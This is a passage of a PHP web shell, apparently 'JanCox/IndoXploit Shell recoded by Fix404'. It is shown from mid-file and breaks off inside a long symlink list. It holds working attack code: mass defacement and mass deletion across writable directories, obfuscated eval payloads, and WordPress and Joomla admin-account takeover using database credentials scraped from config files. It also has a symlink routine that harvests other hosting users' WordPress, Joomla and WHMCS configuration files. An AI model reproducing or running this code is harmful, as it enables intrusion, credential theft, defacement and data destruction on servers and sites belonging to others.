902.         if(is_writable($dir)) {
903.             $dira = scandir($dir);
904.             foreach($dira as $dirb) {
905.                 $dirc = "$dir/$dirb";
906.                 $lokasi = $dirc.'/'.$namafile;
907.                 if($dirb === '.') {
908.                     file_put_contents($lokasi, $isi_script);
909.                 } elseif($dirb === '..') {
910.                     file_put_contents($lokasi, $isi_script);
911.                 } else {
912.                     if(is_dir($dirc)) {
913.                         if(is_writable($dirc)) {
914.                             echo "[<font color=aqua>DONE</font>] $lokasi<br>";
915.                             file_put_contents($lokasi, $isi_script);
916.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
917.                         }
918.                     }
919.                 }
920.             }
921.         }
922.     }
923.     if($_POST['mass'] == 'onedir') {
924.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:white;' name='index' rows='10' cols='67'>\n";
925.         $ini="http://";
926.         $mainpath=$_POST[d_dir];
927.         $file=$_POST[d_file];
928.         $dir=opendir("$mainpath");
929.         $code=base64_encode($_POST[script]);
930.         $indx=base64_decode($code);
931.         while($row=readdir($dir)){
932.         $start=@fopen("$row/$file","w+");
933.         $finish=@fwrite($start,$indx);
934.         if ($finish){
935.             echo"$ini$row/$file\n";
936.             }
937.         }
938.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
939.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
940.         $dir=opendir("$mainpath");
941.         $code=base64_encode($_POST[script]);
942.         $indx=base64_decode($code);
943.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
944.         $finish=@fwrite($start,$indx);
945.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
946.         }
947.  
948.     }
949.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
950.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
951.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
952.     elseif($_POST['mass'] == 'massdeface') {
953.         echo "<div style='margin: 5px auto; padding: 5px'>";
954.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
955.         echo "</div>";  }
956.     else {
957.         echo "
958.         <center><font style='text-decoration: underline;'>
959.         Select Type:<br>
960.         </font>
961.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
962.         <option value=\"onedir\">Mass Deface 1 Dir</option>
963.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
964.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
965.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
966.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
967.         <font style='text-decoration: underline;'>Folder:</font><br>
968.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
969.         <font style='text-decoration: underline;'>Filename:</font><br>
970.         <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
971.         <font style='text-decoration: underline;'>Index File:</font><br>
972.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Fix404</textarea><br>
973.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
974.         </form></center>";
975.         }
976.     }
977. elseif($_GET['do'] == 'zip') {
978.     echo "<center><h1>Zip Menu</h1>";
979. function rmdir_recursive($dir) {
980.     foreach(scandir($dir) as $file) {
981.        if ('.' === $file || '..' === $file) continue;
982.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
983.        else unlink("$dir/$file");
984.    }
985.    rmdir($dir);
986. }
987. if($_FILES["zip_file"]["name"]) {
988.     $filename = $_FILES["zip_file"]["name"];
989.     $source = $_FILES["zip_file"]["tmp_name"];
990.     $type = $_FILES["zip_file"]["type"];
991.     $name = explode(".", $filename);
992.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
993.     foreach($accepted_types as $mime_type) {
994.         if($mime_type == $type) {
995.             $okay = true;
996.             break;
997.         }
998.     }
999.     $continue = strtolower($name[1]) == 'zip' ? true : false;
1000.     if(!$continue) {
1001.         $message = "Itu Bukan Zip  , , GOBLOK COK";
1002.     }
1003.   $path = dirname(__FILE__).'/';
1004.   $filenoext = basename ($filename, '.zip');
1005.   $filenoext = basename ($filenoext, '.ZIP');
1006.   $targetdir = $path . $filenoext;
1007.   $targetzip = $path . $filename;
1008.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
1009.   mkdir($targetdir, 0777);
1010.     if(move_uploaded_file($source, $targetzip)) {
1011.         $zip = new ZipArchive();
1012.         $x = $zip->open($targetzip);
1013.         if ($x === true) {
1014.             $zip->extractTo($targetdir);
1015.             $zip->close();
1016.  
1017.             unlink($targetzip);
1018.         }
1019.         $message = "<b>Sukses Gan :)</b>";
1020.     } else {   
1021.         $message = "<b>Error Gan :(</b>";
1022.     }
1023. }  
1024. echo '<table style="width:100%" border="1">
1025.  <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
1026. <label>Zip File : <input type="file" name="zip_file" /></label>
1027. <input type="submit" name="submit" value="Upload And Unzip" />
1028. </form>';
1029. if($message) echo "<p>$message</p>";
1030. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";  
1031.     if($_POST['backup']){
1032.     $save=$_POST['save'];
1033.     function Zip($source, $destination)
1034. {
1035.     if (extension_loaded('zip') === true)
1036.     {
1037.         if (file_exists($source) === true)
1038.         {
1039.             $zip = new ZipArchive();
1040.  
1041.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
1042.             {
1043.                 $source = realpath($source);
1044.  
1045.                 if (is_dir($source) === true)
1046.                 {
1047.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
1048.  
1049.                     foreach ($files as $file)
1050.                     {
1051.                         $file = realpath($file);
1052.  
1053.                         if (is_dir($file) === true)
1054.                         {
1055.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
1056.                         }
1057.  
1058.                         else if (is_file($file) === true)
1059.                         {
1060.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
1061.                         }
1062.                     }
1063.                 }
1064.  
1065.                 else if (is_file($source) === true)
1066.                 {
1067.                     $zip->addFromString(basename($source), file_get_contents($source));
1068.                 }
1069.             }
1070.  
1071.             return $zip->close();
1072.         }
1073.     }
1074.  
1075.     return false;
1076. }
1077.     Zip($_POST['dir'],$save);
1078.     echo "Done , Save To <b>$save</b>";
1079.     }
1080.     echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
1081.     if($_POST['extrak']){
1082.     $save=$_POST['save'];
1083.     $zip = new ZipArchive;
1084.     $res = $zip->open($_POST['dir']);
1085.     if ($res === TRUE) {
1086.         $zip->extractTo($save);
1087.         $zip->close();
1088.     echo 'Succes , Location : <b>'.$save.'</b>';
1089.     } else {
1090.     echo 'Gagal Mas :( Ntahlah !';
1091.     }
1092.     }
1093. echo '</tr></table>';  
1094.     }
1095.     elseif($_GET['do'] == 'shellchk') {
1096.         eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
1097.          } elseif($_GET['do'] == 'loghunter')
1098.     {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}  
1099. elseif($_GET['do'] == 'metu') {
1100.    
1101.  
1102. echo '<form action="?dir=$dir&do=metu" method="post">';
1103.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1104.     echo 'Byee !';
1105.    
1106. }
1107. elseif($_GET['do'] == 'about') {
1108.    
1109.     echo '<center>JanCox Shell<hr>IndoXploit Shell Recoded By Fix404<br>For More Script Visit <a href="http://cr1p.blogspot.com/">Here</a>';
1110.    
1111. }
1112. elseif($_GET['do'] == 'auto_cu_wp') {
1113. if($_POST['gass']) {
1114.     echo "<center><h1>WordPress Auto Change User 2</h1>
1115.         <form method='post'>
1116.         Link Config: <br>
1117.         <textarea name='link' style='width: 450px; height:250px;'>";
1118.     UrlLoop($_POST['linkconf'],'wordpress');   
1119.     echo"</textarea><br>
1120.         <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
1121.         </form></center>";
1122. }   else {
1123.         echo "<center><h1>WordPress Auto Change User 2</h1>
1124.         <form method='post'>
1125.         Link Config: <br>
1126.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/cox_symconf/'><br>
1127.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
1128.         </form></center>";
1129.     }
1130. if($_POST['auto_cu_wp']) {
1131.    
1132.         function anucurl($sites) {
1133.             $ch = curl_init($sites);
1134.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1135.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1136.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1137.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1138.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1139.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1140.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1141.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1142.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1143.             $data = curl_exec($ch);
1144.                   curl_close($ch);
1145.             return $data;
1146.         }
1147.         $link = explode("\r\n", $_POST['link']);
1148.         $user = "Fix404";
1149.         $pass = "Fix404";
1150.         $passx = md5($pass);
1151.         foreach($link as $dir_config) {
1152.             $config = anucurl($dir_config);
1153.             $dbhost = ambilkata($config,"DB_HOST', '","'");
1154.             $dbuser = ambilkata($config,"DB_USER', '","'");
1155.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1156.             $dbname = ambilkata($config,"DB_NAME', '","'");
1157.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
1158.             $prefix = $dbprefix."users";
1159.             $option = $dbprefix."options";
1160.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1161.             $db = mysql_select_db($dbname);
1162.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1163.             $result = mysql_fetch_array($q);
1164.             $id = $result[ID];
1165.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1166.             $result2 = mysql_fetch_array($q2);
1167.             $target = $result2[option_value];
1168.             if($target == '') {                
1169.                 echo "[-] <font color=white>error, gabisa ambil nama domain nya</font><br>";
1170.             } else {
1171.                 echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
1172.             }
1173.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1174.             if(!$conn OR !$db OR !$update) {
1175.                 echo "[-] MySQL Error: <font color=white>".mysql_error()."</font><br><br>";
1176.                 mysql_close($conn);
1177.             } else {
1178.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1179.                     echo "[+] username: <font color=aqua>$user</font><br>";
1180.                     echo "[+] password: <font color=aqua>$pass</font><br><br>";    
1181.                    
1182.                 mysql_close($conn);
1183.             }
1184.         }
1185.     }  
1186.  
1187. }
1188. elseif($_GET['do'] == 'auto_cu_joomla') {
1189. if($_POST['gass']) {
1190.     echo "<center><h1>Joomla Auto Change User 2</h1>
1191.         <form method='post'>
1192.         Link Config: <br>
1193.         <textarea name='link' style='width: 450px; height:250px;'>";
1194.     UrlLoop($_POST['linkconf'],'joomla');  
1195.     echo"</textarea><br>
1196.         <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
1197.         </form></center>";
1198. }   else {
1199.         echo "<center><h1>Joomla Auto Change User 2</h1>
1200.         <form method='post'>
1201.         Link Config: <br>
1202.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/cox_symconf/'><br>
1203.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
1204.         </form></center>";
1205.     }
1206. if($_POST['auto_cu_joomla']) {
1207.    
1208.         function anucurl($sites) {
1209.             $ch = curl_init($sites);
1210.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1211.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1212.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1213.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1214.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1215.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1216.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1217.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1218.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1219.             $data = curl_exec($ch);
1220.                   curl_close($ch);
1221.             return $data;
1222.         }
1223.         $link = explode("\r\n", $_POST['link']);
1224.         $user = "Fix404";
1225.         $pass = "Fix404";
1226.         $passx = md5($pass);
1227.         foreach($link as $dir_config) {
1228.             $config = anucurl($dir_config);
1229.                     $dbhost = ambilkata($config,"host = '","'");
1230.                     $dbuser = ambilkata($config,"user = '","'");
1231.                     $dbpass = ambilkata($config,"password = '","'");
1232.                     $dbname = ambilkata($config,"db = '","'");
1233.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
1234.                     $prefix = $dbprefix."users";
1235.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1236.                     $db = mysql_select_db($dbname);
1237.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1238.                     $result = mysql_fetch_array($q);
1239.                     $id = $result['id'];
1240.                     $site = ambilkata($config,"sitename = '","'");
1241.                     $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
1242.                     echo "Config => ".$dir_config."<br>";
1243.                     echo "CMS => Joomla<br>";
1244.                     if($site == '') {
1245.                         echo "Sitename => <font color=white>error, gabisa ambil nama domain nya</font><br>";
1246.                     } else {
1247.                         echo "Sitename => $site<br>";
1248.                     }
1249.                     if(!$update OR !$conn OR !$db) {
1250.                         echo "Status => <font color=white>".mysql_error()."</font><br><br>";
1251.                     } else {
1252.                         echo "Status => Done , Username : <font color=aqua>$user</font> Password : <font color=aqua>$pass</font><br><br>";
1253.                     }
1254.                     mysql_close($conn);
1255.                     }
1256.     }  
1257. }
1258. elseif($_GET['do'] == 'symconfig') {
1259. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
1260. echo '<script>alert("Skid this won\'t work on Windows")</script>';
1261. exit;
1262. }
1263. else
1264. {
1265. if($_POST["m"] && !$_POST["passwd"]==""){
1266. @mkdir("cox_symconf", 0777);
1267. @chdir("cox_symconf");
1268. @symlink("/","root");
1269. $htaccess="Options Indexes FollowSymLinks
1270. DirectoryIndex jancox.htm
1271. AddType text/plain .php
1272. AddHandler text/plain .php
1273. Satisfy Any";
1274. @file_put_contents(".htaccess",$htaccess);
1275. $etc_passwd=$_POST["passwd"];
1276. $etc_passwd=explode("\n",$etc_passwd);
1277. foreach($etc_passwd as $passwd){
1278. $pawd=explode(":",$passwd);
1279. $user =$pawd[0];
1280.  
1281. @symlink('/','cox_symconf/root');
1282. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1283. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1284. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1285. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1286. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1287. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1288. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1289. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1290. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1291. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1292. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1293. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1294. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1295. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1296. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1297. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1298. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1299. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1300. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1301. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1302. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1303. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1304. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1305. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1306. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1307. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1308. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1309. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1310. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1311. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1312. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1313. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1314. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1315. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1316. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1317. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1318. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1319. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1320. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1321. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1322. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1323. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1324. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1325. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1326. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1327. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1328. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1329. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1330. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1331. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1332. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1333. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1334. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1335. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1336. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1337. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1338. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1339. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1340. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1341. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1342. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1343. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1344. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1345. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1346. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1347. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1348. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1349. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1350. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1351. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1352. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1353. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1354. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1355. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1356. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1357. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1358. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1359. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1360. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1361. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1362. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1363. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1364. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1365. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1366. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1367. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1368. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1369. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1370. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1371. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1372. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1373. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1374. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1375. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1376. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1377. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1378. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1379. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1380. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
